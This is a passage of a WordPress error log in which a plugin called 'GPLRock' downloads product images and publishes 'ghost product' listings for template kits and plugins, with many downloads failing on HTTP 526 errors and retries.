https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-6a788708.webp [05-Apr-2026 15:17:37 UTC] GPLRock: Ghost product published with image - Product ID: chakta-auto-parts-store-accessories-elementor-template-kit [05-Apr-2026 15:17:38 UTC] GPLRock: Image downloaded successfully for product ceria-kindergarten-pre-school-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-523bad21.webp [05-Apr-2026 15:17:38 UTC] GPLRock: Using pre-downloaded image for product ceria-kindergarten-pre-school-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-523bad21.webp [05-Apr-2026 15:17:38 UTC] GPLRock: Ghost product published with image - Product ID: ceria-kindergarten-pre-school-elementor-template-kit [05-Apr-2026 15:17:40 UTC] GPLRock: Image downloaded successfully for product carne-meat-shop-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-47027c99.webp [05-Apr-2026 15:17:40 UTC] GPLRock: Using pre-downloaded image for product carne-meat-shop-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-47027c99.webp [05-Apr-2026 15:17:40 UTC] GPLRock: Ghost product published with image - Product ID: carne-meat-shop-elementor-template-kit [05-Apr-2026 15:17:41 UTC] GPLRock: Image downloaded successfully for product cargel-logistic-cargo-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-2333cf91.webp [05-Apr-2026 15:17:41 UTC] GPLRock: Using pre-downloaded image for product cargel-logistic-cargo-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-2333cf91.webp [05-Apr-2026 15:17:41 UTC] GPLRock: Ghost product published with image - Product ID: cargel-logistic-cargo-elementor-template-kit [05-Apr-2026 15:17:43 UTC] GPLRock: Image downloaded successfully for product careera-recruitment-agency-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-bbddfca1.webp [05-Apr-2026 15:17:43 UTC] GPLRock: Using pre-downloaded image for product careera-recruitment-agency-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-bbddfca1.webp [05-Apr-2026 15:17:43 UTC] GPLRock: Ghost product published with image - Product ID: careera-recruitment-agency-elementor-template-kit [05-Apr-2026 15:17:44 UTC] GPLRock: Image downloaded successfully for product callerr-call-center-service-telemarketing-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a3e64686.jpg [05-Apr-2026 15:17:44 UTC] GPLRock: Using pre-downloaded image for product callerr-call-center-service-telemarketing-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a3e64686.jpg [05-Apr-2026 15:17:44 UTC] GPLRock: Ghost product published with image - Product ID: callerr-call-center-service-telemarketing-elementor-template-kit [05-Apr-2026 15:17:46 UTC] GPLRock: Image downloaded successfully for product businext-corporate-business-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-c5cd9a0a.jpg [05-Apr-2026 15:17:46 UTC] GPLRock: Using pre-downloaded image for product businext-corporate-business-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-c5cd9a0a.jpg [05-Apr-2026 15:17:46 UTC] GPLRock: Ghost product published with image - Product ID: businext-corporate-business-elementor-template-kit [05-Apr-2026 15:19:28 UTC] GPLRock: Image download failed for product flatprice-wordpress-pricing-tables (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:19:30 UTC] GPLRock: Image download failed for product flatprice-wordpress-pricing-tables (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:19:32 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/flatprice---wordpress-pricing-tables-17902.webp for product flatprice-wordpress-pricing-tables after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:19:32 UTC] GPLRock: Image download failed for product flatprice-wordpress-pricing-tables (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:19:34 UTC] GPLRock: Image download failed for product flatprice-wordpress-pricing-tables (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:19:36 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/flatprice---wordpress-pricing-tables-17902.webp for product flatprice-wordpress-pricing-tables after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:19:36 UTC] GPLRock WARNING: Image download failed for product flatprice-wordpress-pricing-tables. URL: https://meldwp.com/wp-content/uploads/flatprice---wordpress-pricing-tables-17902.webp [05-Apr-2026 15:19:36 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: flatprice-wordpress-pricing-tables [05-Apr-2026 15:19:37 UTC] GPLRock: Image download failed for product taskly-project-management-tool (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:19:39 UTC] GPLRock: Image download failed for product taskly-project-management-tool (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:19:41 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/taskly--project-management-tool-18987.webp for product taskly-project-management-tool after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:19:41 UTC] GPLRock: Image download failed for product taskly-project-management-tool (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:19:43 UTC] GPLRock: Image download failed for product taskly-project-management-tool (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:19:45 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/taskly--project-management-tool-18987.webp for product taskly-project-management-tool after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:19:45 UTC] GPLRock WARNING: Image download failed for product taskly-project-management-tool. URL: https://meldwp.com/wp-content/uploads/taskly--project-management-tool-18987.webp [05-Apr-2026 15:19:45 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: taskly-project-management-tool [05-Apr-2026 15:19:45 UTC] GPLRock: Image download failed for product wiloke-posts-tab-and-grid (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:19:47 UTC] GPLRock: Image download failed for product wiloke-posts-tab-and-grid (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:19:49 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wiloke-posts-tab-and-grid-1806.webp for product wiloke-posts-tab-and-grid after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:19:50 UTC] GPLRock: Image download failed for product wiloke-posts-tab-and-grid (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:19:52 UTC] GPLRock: Image download failed for product wiloke-posts-tab-and-grid (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:19:54 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wiloke-posts-tab-and-grid-1806.webp for product wiloke-posts-tab-and-grid after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:19:54 UTC] GPLRock WARNING: Image download failed for product wiloke-posts-tab-and-grid. URL: https://meldwp.com/wp-content/uploads/wiloke-posts-tab-and-grid-1806.webp [05-Apr-2026 15:19:54 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wiloke-posts-tab-and-grid [05-Apr-2026 15:19:54 UTC] GPLRock: Image download failed for product post-grid-pro (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:19:56 UTC] GPLRock: Image download failed for product post-grid-pro (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:19:58 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/post-grid-pro-30665.webp for product post-grid-pro after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:19:58 UTC] GPLRock: Image download failed for product post-grid-pro (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:20:00 UTC] GPLRock: Image download failed for product post-grid-pro (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:20:02 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/post-grid-pro-30665.webp for product post-grid-pro after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:20:02 UTC] GPLRock WARNING: Image download failed for product post-grid-pro. URL: https://meldwp.com/wp-content/uploads/post-grid-pro-30665.webp [05-Apr-2026 15:20:02 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: post-grid-pro [05-Apr-2026 15:20:03 UTC] GPLRock: Image download failed for product wpbakery-page-builder-addons-bundle-2 (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:20:05 UTC] GPLRock: Image download failed for product wpbakery-page-builder-addons-bundle-2 (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:20:07 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wpbakery-page-builder-addons-bundle-19677.webp for product wpbakery-page-builder-addons-bundle-2 after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:20:07 UTC] GPLRock: Image download failed for product wpbakery-page-builder-addons-bundle-2 (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:20:09 UTC] GPLRock: Image download failed for product wpbakery-page-builder-addons-bundle-2 (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:20:11 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wpbakery-page-builder-addons-bundle-19677.webp for product wpbakery-page-builder-addons-bundle-2 after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:20:11 UTC] GPLRock WARNING: Image download failed for product wpbakery-page-builder-addons-bundle-2. URL: https://meldwp.com/wp-content/uploads/wpbakery-page-builder-addons-bundle-19677.webp [05-Apr-2026 15:20:11 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wpbakery-page-builder-addons-bundle-2 [05-Apr-2026 15:20:12 UTC] GPLRock: Image download failed for product woocommerce-custom-product-description-in-loop-for-products-catalog (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:20:14 UTC] GPLRock: Image download failed for product woocommerce-custom-product-description-in-loop-for-products-catalog (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:20:16 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-custom-product-description-in-loop-for-products-catalog-32123.webp for product woocommerce-custom-product-description-in-loop-for-products-catalog after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:20:16 UTC] GPLRock: Image download failed for product woocommerce-custom-product-description-in-loop-for-products-catalog (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:20:18 UTC] GPLRock: Image download failed for product woocommerce-custom-product-description-in-loop-for-products-catalog (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:20:20 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-custom-product-description-in-loop-for-products-catalog-32123.webp for product woocommerce-custom-product-description-in-loop-for-products-catalog after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:20:20 UTC] GPLRock WARNING: Image download failed for product woocommerce-custom-product-description-in-loop-for-products-catalog. URL: https://meldwp.com/wp-content/uploads/woocommerce-custom-product-description-in-loop-for-products-catalog-32123.webp [05-Apr-2026 15:20:20 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-custom-product-description-in-loop-for-products-catalog [05-Apr-2026 15:20:21 UTC] GPLRock: Image download failed for product 6ammart-multivendor-food-grocery-ecommerce-parcel-pharmacy-delivery-app-with-admin-website (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:20:23 UTC] GPLRock: Image download failed for product 6ammart-multivendor-food-grocery-ecommerce-parcel-pharmacy-delivery-app-with-admin-website (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:20:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/6ammart---multivendor-food-grocery-ecommerce-parcel-pharmacy-delivery-app-with-a-6004.webp for product 6ammart-multivendor-food-grocery-ecommerce-parcel-pharmacy-delivery-app-with-admin-website after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:20:25 UTC] GPLRock: Image download failed for product 6ammart-multivendor-food-grocery-ecommerce-parcel-pharmacy-delivery-app-with-admin-website (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:20:27 UTC] GPLRock: Image download failed for product 6ammart-multivendor-food-grocery-ecommerce-parcel-pharmacy-delivery-app-with-admin-website (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:20:29 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/6ammart---multivendor-food-grocery-ecommerce-parcel-pharmacy-delivery-app-with-a-6004.webp for product 6ammart-multivendor-food-grocery-ecommerce-parcel-pharmacy-delivery-app-with-admin-website after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:20:29 UTC] GPLRock WARNING: Image download failed for product 6ammart-multivendor-food-grocery-ecommerce-parcel-pharmacy-delivery-app-with-admin-website. URL: https://meldwp.com/wp-content/uploads/6ammart---multivendor-food-grocery-ecommerce-parcel-pharmacy-delivery-app-with-a-6004.webp [05-Apr-2026 15:20:29 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: 6ammart-multivendor-food-grocery-ecommerce-parcel-pharmacy-delivery-app-with-admin-website [05-Apr-2026 15:20:29 UTC] GPLRock: Image download failed for product woocommerce-products-questions-answered-system (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:20:31 UTC] GPLRock: Image download failed for product woocommerce-products-questions-answered-system (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:20:33 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-products-questions-answered-system-4124.webp for product woocommerce-products-questions-answered-system after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:20:34 UTC] GPLRock: Image download failed for product woocommerce-products-questions-answered-system (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:20:36 UTC] GPLRock: Image download failed for product woocommerce-products-questions-answered-system (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:20:38 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-products-questions-answered-system-4124.webp for product woocommerce-products-questions-answered-system after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:20:38 UTC] GPLRock WARNING: Image download failed for product woocommerce-products-questions-answered-system. URL: https://meldwp.com/wp-content/uploads/woocommerce-products-questions-answered-system-4124.webp [05-Apr-2026 15:20:38 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-products-questions-answered-system [05-Apr-2026 15:20:38 UTC] GPLRock: Image download failed for product pesi-questionnaire-multiresult-survey-and-quiz-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:20:40 UTC] GPLRock: Image download failed for product pesi-questionnaire-multiresult-survey-and-quiz-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:20:42 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/pesi-questionnaire---multiresult-survey-and-quiz-wordpress-plugin-33411.webp for product pesi-questionnaire-multiresult-survey-and-quiz-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:20:42 UTC] GPLRock: Image download failed for product pesi-questionnaire-multiresult-survey-and-quiz-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:20:45 UTC] GPLRock: Image download failed for product pesi-questionnaire-multiresult-survey-and-quiz-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:20:47 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/pesi-questionnaire---multiresult-survey-and-quiz-wordpress-plugin-33411.webp for product pesi-questionnaire-multiresult-survey-and-quiz-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:20:47 UTC] GPLRock WARNING: Image download failed for product pesi-questionnaire-multiresult-survey-and-quiz-wordpress-plugin. URL: https://meldwp.com/wp-content/uploads/pesi-questionnaire---multiresult-survey-and-quiz-wordpress-plugin-33411.webp [05-Apr-2026 15:20:47 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: pesi-questionnaire-multiresult-survey-and-quiz-wordpress-plugin [05-Apr-2026 15:20:47 UTC] GPLRock: Image download failed for product woocommerce-checkout-google-address-auto-complete (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:20:49 UTC] GPLRock: Image download failed for product woocommerce-checkout-google-address-auto-complete (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:20:51 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-checkout-google-address-auto-complete-21175.webp for product woocommerce-checkout-google-address-auto-complete after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:20:51 UTC] GPLRock: Image download failed for product woocommerce-checkout-google-address-auto-complete (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:20:53 UTC] GPLRock: Image download failed for product woocommerce-checkout-google-address-auto-complete (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:20:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-checkout-google-address-auto-complete-21175.webp for product woocommerce-checkout-google-address-auto-complete after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:20:55 UTC] GPLRock WARNING: Image download failed for product woocommerce-checkout-google-address-auto-complete. URL: https://meldwp.com/wp-content/uploads/woocommerce-checkout-google-address-auto-complete-21175.webp [05-Apr-2026 15:20:55 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-checkout-google-address-auto-complete [05-Apr-2026 15:21:20 UTC] GPLRock: Image download failed for product recipe-box-recipe-plugin-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:21:22 UTC] GPLRock: Image download failed for product recipe-box-recipe-plugin-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:21:24 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/recipe-box---recipe-plugin-for-wordpress-11131.webp for product recipe-box-recipe-plugin-for-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:21:24 UTC] GPLRock: Image download failed for product recipe-box-recipe-plugin-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:21:26 UTC] GPLRock: Image download failed for product recipe-box-recipe-plugin-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:21:28 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/recipe-box---recipe-plugin-for-wordpress-11131.webp for product recipe-box-recipe-plugin-for-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:21:28 UTC] GPLRock WARNING: Image download failed for product recipe-box-recipe-plugin-for-wordpress. URL: https://meldwp.com/wp-content/uploads/recipe-box---recipe-plugin-for-wordpress-11131.webp [05-Apr-2026 15:21:28 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: recipe-box-recipe-plugin-for-wordpress [05-Apr-2026 15:21:28 UTC] GPLRock: Image downloaded successfully for product asche-plugin-coming-soon-maintenance-mode-login-designer (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-cfceee21.webp [05-Apr-2026 15:21:28 UTC] GPLRock: Using pre-downloaded image for product asche-plugin-coming-soon-maintenance-mode-login-designer: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-cfceee21.webp [05-Apr-2026 15:21:28 UTC] GPLRock: Ghost product published with image - Product ID: asche-plugin-coming-soon-maintenance-mode-login-designer [05-Apr-2026 15:21:28 UTC] GPLRock: Image download failed for product woocommerce-product-thumbnail-and-gallery-video (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:21:31 UTC] GPLRock: Image download failed for product woocommerce-product-thumbnail-and-gallery-video (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:21:33 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-product-thumbnail-and-gallery-video-2934.webp for product woocommerce-product-thumbnail-and-gallery-video after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:21:33 UTC] GPLRock: Image download failed for product woocommerce-product-thumbnail-and-gallery-video (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:21:35 UTC] GPLRock: Image download failed for product woocommerce-product-thumbnail-and-gallery-video (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:21:37 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-product-thumbnail-and-gallery-video-2934.webp for product woocommerce-product-thumbnail-and-gallery-video after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:21:37 UTC] GPLRock WARNING: Image download failed for product woocommerce-product-thumbnail-and-gallery-video. URL: https://meldwp.com/wp-content/uploads/woocommerce-product-thumbnail-and-gallery-video-2934.webp [05-Apr-2026 15:21:37 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-product-thumbnail-and-gallery-video [05-Apr-2026 15:21:37 UTC] GPLRock: Image downloaded successfully for product schedule-report-for-advanced-cf7-db (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-364cd3a2.webp [05-Apr-2026 15:21:37 UTC] GPLRock: Using pre-downloaded image for product schedule-report-for-advanced-cf7-db: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-364cd3a2.webp [05-Apr-2026 15:21:37 UTC] GPLRock: Ghost product published with image - Product ID: schedule-report-for-advanced-cf7-db [05-Apr-2026 15:21:37 UTC] GPLRock: Image download failed for product icomply-cookie-notice-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:21:39 UTC] GPLRock: Image download failed for product icomply-cookie-notice-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:21:41 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/icomply---cookie-notice-for-wordpress-19591.webp for product icomply-cookie-notice-for-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:21:42 UTC] GPLRock: Image download failed for product icomply-cookie-notice-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:21:44 UTC] GPLRock: Image download failed for product icomply-cookie-notice-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:21:46 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/icomply---cookie-notice-for-wordpress-19591.webp for product icomply-cookie-notice-for-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:21:46 UTC] GPLRock WARNING: Image download failed for product icomply-cookie-notice-for-wordpress. URL: https://meldwp.com/wp-content/uploads/icomply---cookie-notice-for-wordpress-19591.webp [05-Apr-2026 15:21:46 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: icomply-cookie-notice-for-wordpress [05-Apr-2026 15:21:46 UTC] GPLRock: Image download failed for product wordpress-gdpr-ccpa (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:21:48 UTC] GPLRock: Image download failed for product wordpress-gdpr-ccpa (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:21:50 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wordpress-gdpr--ccpa-30105.webp for product wordpress-gdpr-ccpa after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:21:50 UTC] GPLRock: Image download failed for product wordpress-gdpr-ccpa (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:21:52 UTC] GPLRock: Image download failed for product wordpress-gdpr-ccpa (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:21:54 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wordpress-gdpr--ccpa-30105.webp for product wordpress-gdpr-ccpa after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:21:54 UTC] GPLRock WARNING: Image download failed for product wordpress-gdpr-ccpa. URL: https://meldwp.com/wp-content/uploads/wordpress-gdpr--ccpa-30105.webp [05-Apr-2026 15:21:54 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wordpress-gdpr-ccpa [05-Apr-2026 15:21:55 UTC] GPLRock: Image download failed for product easy-video-player-wordpress-woocommerce-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:21:57 UTC] GPLRock: Image download failed for product easy-video-player-wordpress-woocommerce-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:21:59 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/easy-video-player-wordpress--woocommerce-plugin-29602.webp for product easy-video-player-wordpress-woocommerce-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:21:59 UTC] GPLRock: Image download failed for product easy-video-player-wordpress-woocommerce-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:22:01 UTC] GPLRock: Image download failed for product easy-video-player-wordpress-woocommerce-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:22:03 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/easy-video-player-wordpress--woocommerce-plugin-29602.webp for product easy-video-player-wordpress-woocommerce-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:22:03 UTC] GPLRock WARNING: Image download failed for product easy-video-player-wordpress-woocommerce-plugin. URL: https://meldwp.com/wp-content/uploads/easy-video-player-wordpress--woocommerce-plugin-29602.webp [05-Apr-2026 15:22:03 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: easy-video-player-wordpress-woocommerce-plugin [05-Apr-2026 15:22:03 UTC] GPLRock: Image download failed for product adforest-classified-native-android-app (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:22:06 UTC] GPLRock: Image download failed for product adforest-classified-native-android-app (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:22:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/adforest---classified-native-android-app-33259.webp for product adforest-classified-native-android-app after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:22:08 UTC] GPLRock: Image download failed for product adforest-classified-native-android-app (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:22:10 UTC] GPLRock: Image download failed for product adforest-classified-native-android-app (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:22:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/adforest---classified-native-android-app-33259.webp for product adforest-classified-native-android-app after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:22:12 UTC] GPLRock WARNING: Image download failed for product adforest-classified-native-android-app. URL: https://meldwp.com/wp-content/uploads/adforest---classified-native-android-app-33259.webp [05-Apr-2026 15:22:12 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: adforest-classified-native-android-app [05-Apr-2026 15:22:12 UTC] GPLRock: Image download failed for product rira-video-elementor-video-playlist-widget (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:22:14 UTC] GPLRock: Image download failed for product rira-video-elementor-video-playlist-widget (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:22:16 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/rira-video---elementor-video-playlist-widget-15818.webp for product rira-video-elementor-video-playlist-widget after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:22:17 UTC] GPLRock: Image download failed for product rira-video-elementor-video-playlist-widget (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:22:19 UTC] GPLRock: Image download failed for product rira-video-elementor-video-playlist-widget (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:22:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/rira-video---elementor-video-playlist-widget-15818.webp for product rira-video-elementor-video-playlist-widget after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:22:21 UTC] GPLRock WARNING: Image download failed for product rira-video-elementor-video-playlist-widget. URL: https://meldwp.com/wp-content/uploads/rira-video---elementor-video-playlist-widget-15818.webp [05-Apr-2026 15:22:21 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: rira-video-elementor-video-playlist-widget [05-Apr-2026 15:22:21 UTC] GPLRock: Image download failed for product super-product-variation-swatches-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:22:23 UTC] GPLRock: Image download failed for 